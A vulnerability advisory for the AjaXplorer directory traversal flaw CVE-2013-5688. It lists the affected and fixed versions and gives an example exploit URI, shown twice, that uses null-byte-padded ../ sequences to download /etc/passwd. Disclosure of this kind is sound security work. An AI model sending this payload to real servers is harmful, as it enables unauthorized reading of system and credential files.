AjaXplorer CVE-2013-5688 Directory Traversal Vulnerability
BID:62260
Info
AjaXplorer CVE-2013-5688 Directory Traversal Vulnerability
| Bugtraq ID: | 62260 |
| Class: | Design Error |
| CVE: |
CVE-2013-5688 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 05 2013 12:00AM |
| Updated: | Sep 05 2013 12:00AM |
| Credit: | Vikas Singhal of Trustwave SpiderLabs |
| Vulnerable: |
AjaXplorer AjaXplorer 5.0.1 AjaXplorer AjaXplorer 4.0.4 AjaXplorer AjaXplorer 4.0.3 AjaXplorer AjaXplorer 4.0.2 AjaXplorer AjaXplorer 4.0.1 AjaXplorer AjaXplorer 3.2.5 AjaXplorer AjaXplorer 3.2.4 AjaXplorer AjaXplorer 3.1.1 AjaXplorer AjaXplorer 2.6.2 AjaXplorer AjaXplorer 2.6.1 AjaXplorer AjaXplorer 2.5.5 AjaXplorer AjaXplorer 2.5.3 AjaXplorer AjaXplorer 2.5.2 AjaXplorer AjaXplorer 5.0.2 AjaXplorer AjaXplorer 3.2 AjaXplorer AjaXplorer 2.6 |
| Not Vulnerable: |
AjaXplorer AjaXplorer 5.0.3 |
Exploit / POC
AjaXplorer CVE-2013-5688 Directory Traversal Vulnerability
Attackers can exploit this issue using a web browser.
The following example URI is available:
http://www.example.com/filemanagers/ajaxplorer/index.php?secure_token=[latest token]&get_action=download&dir=%2F&file=/%00../%00../%00../%00../%00../%00../%00../%00../%00../%00../etc/passwd HTTP/1.1
Attackers can exploit this issue using a web browser.
The following example URI is available:
http://www.example.com/filemanagers/ajaxplorer/index.php?secure_token=[latest token]&get_action=download&dir=%2F&file=/%00../%00../%00../%00../%00../%00../%00../%00../%00../%00../etc/passwd HTTP/1.1
Solution / Fix
AjaXplorer CVE-2013-5688 Directory Traversal Vulnerability
Solution:
Updates are available. Please see the references or vendor advisory for more information.
Solution:
Updates are available. Please see the references or vendor advisory for more information.